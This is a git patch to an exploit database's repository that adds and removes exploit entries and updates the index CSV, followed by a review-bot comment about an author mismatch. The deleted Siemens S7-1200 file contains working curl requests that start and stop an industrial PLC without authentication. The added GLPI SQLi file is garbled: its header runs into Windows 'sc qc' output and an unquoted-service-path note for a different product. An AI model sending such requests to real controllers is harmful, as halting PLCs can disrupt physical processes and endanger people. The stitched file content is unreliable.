From 2ad6c864512cee6b0821035605c4c5a403bba98e Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 15 Mar 2022 05:01:36 +0000
Subject: [PATCH] DB: 2022-03-15 4 changes to exploits/shellcodes VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Baixar GLPI Project 9.4.6 - SQLi
---
 exploits/hardware/remote/50820.txt | 16 ----------------
 exploits/multiple/webapps/50823.txt | 13 +++++++++++++
 exploits/windows/local/50824.txt | 28 ++++++++++++++++++++++++++++
 files_exploits.csv | 3 ++-
 4 files changed, 43 insertions(+), 17 deletions(-)
 delete mode 100644 exploits/hardware/remote/50820.txt
 create mode 100644 exploits/multiple/webapps/50823.txt
 create mode 100644 exploits/windows/local/50824.txt
diff --git a/exploits/hardware/remote/50820.txt b/exploits/hardware/remote/50820.txt
deleted file mode 100644
index 5f0eb57108..0000000000
--- a/exploits/hardware/remote/50820.txt
+++ /dev/null
@@ -1,16 +0,0 @@
-# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command
-# Date: 09/03/2022
-# Exploit Author: RoseSecurity
-# Vendor Homepage: https://www.siemens.com/global/en.html
-# Version: V4.5 and below
-# Tested on: Siemens S7-1200 (CPU: 1215C)
-
-# IP == PLC IP address
-
-# Start Command
-
-curl -i -s -k -X $'POST' \ -H $'Host: ' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http:///Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http:///CPUCommands'
-
-# Stop Command
-
-curl -i -s -k -X $'POST' \ -H $'Host: ' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http:///Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http:///CPUCommands'
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50823.txt b/exploits/multiple/webapps/50823.txt
new file mode 100644
index 0000000000..5ee48c4530
--- /dev/null
+++ b/exploits/multiple/webapps/50823.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
+# Date: 10/12
+# Exploit Author: Joas Antonio
+# Vendor Homepage: https://glpi-project.org/pt-br/ sc qc "VIVE Runtime Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VIVE Runtime Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : VIVE Runtime Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bb3d82f8b9..ec0ae086c4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11471,6 +11471,7 @@ id,file,description,date,author,type,platform,port
 50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18646,7 +18647,6 @@ id,file,description,date,author,type,platform,port
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
-50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
 50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
@@ -44892,3 +44892,4 @@ id,file,description,date,author,type,platform,port
 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
 50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,
 50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,
+50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
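Review bot: The author field of the added 50823 row in the second hunk (`@@ -44892,3 +44892,4 @@`), `"Prof. Joas Antonio"`, does not match the `# Exploit Author: Joas Antonio` header of exploits/multiple/webapps/50823.txt created by the same patch, so an author lookup in the index and in the file would disagree. Whichever form is canonical, the two should be reconciled, e.g. `50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Joas Antonio",webapps,multiple,` or the matching change to the file header. The row's `1970-01-01` date follows the placeholder used by every neighbouring row, but the file header's `# Date: 10/12` carries no year, so the index cannot be corrected from the file either; presumably the header should be completed in the same change.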